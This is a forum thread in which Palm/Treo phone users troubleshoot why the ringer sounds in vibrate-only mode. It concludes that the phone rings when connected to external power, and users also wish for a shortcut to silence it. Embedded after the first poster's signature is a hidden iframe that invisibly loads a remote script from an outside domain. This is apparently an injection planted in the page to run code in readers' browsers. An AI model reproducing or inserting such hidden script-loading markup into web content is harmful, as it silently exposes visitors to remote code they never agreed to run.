+ Reply to Thread

Ring volumn but set to vibrate?

I went to phone prefs and went to "call/ring vibe, and have it set to "vibrate only" but the phone still rings? what am i doing wrong? I have done a search but cannot find info on this.

Dreaderus<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Do you have "ring by category" enabled? Not sure if that has any effect.

Also, in terms of vibe mode, I use the one on the "phone alerts" page. That ensures that the thing won't make any noice (except the buzzing from the vibe, which can be quite loud against a table )

I have ring by category disabled, however its weird sometimes it vibrates and other times it rings. hope someone can help.

Dreaderus

It will always ring if it's in the cradle. And as Kliueless mentioned, it should be set in the Phone Prefs app. Otherwise that I'm not sure

Ugh... doesn't sound like a typical problem... Have you tried a soft reset? Or maybe changing it to ring, resetting, then changing it back to vibe? It could be that your prefs database is corrupt and needs to be "flushed" by changing the setting... but I'm just grasping at straws.

One thing that might cause this, which is one of my only pet peeves about the phone: I like to leave my phone on vibrate, but sometimes I like to hear the Palm sounds, and sometimes not. So I was thinking of using the side buttons to silence and activate the sounds. However, when you use the side button to re-enable sounds, it automatically changes your ringer from vibrate back to the normal ring. Could this be what happened, dreaderus?

And does anyone know of a shortcut to change only the Palm sounds, but leave the ringer alone, other than going into the Prefs? Thanks!

it rings when its on the cradle but not when its off of it. wow thats interesting.

Dreaderus

me too - screwy ringer

For the last few days I have had a similar problem. I click the side button in the morning so my ringer is set to Silent Mode while I am at my desk (the vibrating is enough to jolt the dead).

The phone is not in the cradle, just to the power charger laying on the desk.

Even though it clearly says it in in Silent Mode, even though no alarms sounds, they just vibrate - the PHONE STILL RINGS.

Yes, I have ring by category - but I have used it this way since I got the phone in mid-January and only this week does this pop up.

Strange, but true.

ALSO...
    Does anyone know a shortcut to simply turn the phone to vibe mode, but keep the alarms audible? Without going to Prefs and changing to Vibe Only there on the ringers? I forget then, since I don't have the silent bell on the top screen to remind me the ringer is off.

I think it will still ring because it's hooked to external power. Correct me if I'm wrong.

Other people have suggested making a ringer that is silent and assigning it to your categories and as the default ringer. Then your palm sounds would work and you can have vibrate or not.

I checked the Files area and couldn't find such a ringer. If anyone has one, please post.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

external power

as far as still ringing b/c it is connected to external power....

I would agree if that is what had been happening all along, but this is weird new quirk that just popped up.

And it is not consistent... sometimes it just vibrates, the next day it rings in Silent Mode.

For me the Silent Ringer option is as fiddly as the Vibe Only choice b/c you have to go to Prefs and select it instead of just one button.

I know, I must be high-maintenance. I want the phone to shut up and alarms to go off at work.... without having to click through Prefs to do it!

Not high maintenance at all. It should work like it's supposed to. I'll have to try mine hooked to power and muted to see what it does.

I agree the silent ringer is extra work. I wish there was a choice for mute that didn't vibrate.

Here you go:

Set to vibe only
    Will vibrate when not connected to power source
    Will ring when connected to power source

Set to lights only
    Will light only when not connected to power source
    Will light only when connected to power source

The concept here is that when connected to external power, it's not on you, and you would not feel it vibrate anyway.

Thanks HoTSynC. That's one of those settings that don't seem to be where you'd think. You're trying to control ringing so I'd think it was under incoming calls where you set ringing.

Re: me too - screwy ringer

Originally posted by milonguera
    [...]
    ALSO...
    Does anyone know a shortcut to simply turn the phone to vibe mode, but keep the alarms audible? Without going to Prefs and changing to Vibe Only there on the ringers? I forget then, since I don't have the silent bell on the top screen to remind me the ringer is off.
    This is exactly the question I was trying to ask. I wish that the buttons on the side controlled the Palm sounds, and all the "other" phone sounds (vm bips, etc.), and made the ringer silent if it wasn't, but didn't make the ringer make noise if it was silent before. I wish that whatever I set the ringer to in the Prefs is what it went back to when I turned silent mode off. I guess I feel like I went to the effort of setting it explicitly, the temporary silent mode shouldn't be changing that setting for me. Oh well. A shortcut, as you suggest, that sets it back to vibrate quickly would also make this no big deal.